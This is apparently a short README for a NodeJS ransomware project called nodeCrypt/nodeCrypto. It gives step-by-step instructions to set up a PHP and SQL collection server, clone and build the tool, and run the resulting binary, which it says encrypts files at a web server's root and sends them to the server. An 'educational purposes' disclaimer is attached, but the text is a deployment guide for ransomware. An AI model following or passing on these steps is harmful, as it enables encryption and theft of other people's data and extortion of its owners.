nodeCrypt is a linux Ransomware written in NodeJs that encrypt predefined files.
This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.
Demo video
Install server
Upload all file of server/ folder on your webserver.
Create a sql database and import sql/nodeCrypto.sql
Edit server/libs/db.php and add your SQL ID.
Install and run
git clone https://github.com/atmoner/nodeCrypto.gitcd nodeCrypto && npm installcd sources && npm installcd .. && npm startOnce your configuration is complete, run compile!
You can start the ransomware.
cd sources && ./outputThe files at the root of the web server will encrypt and send to the server.
Screenshot



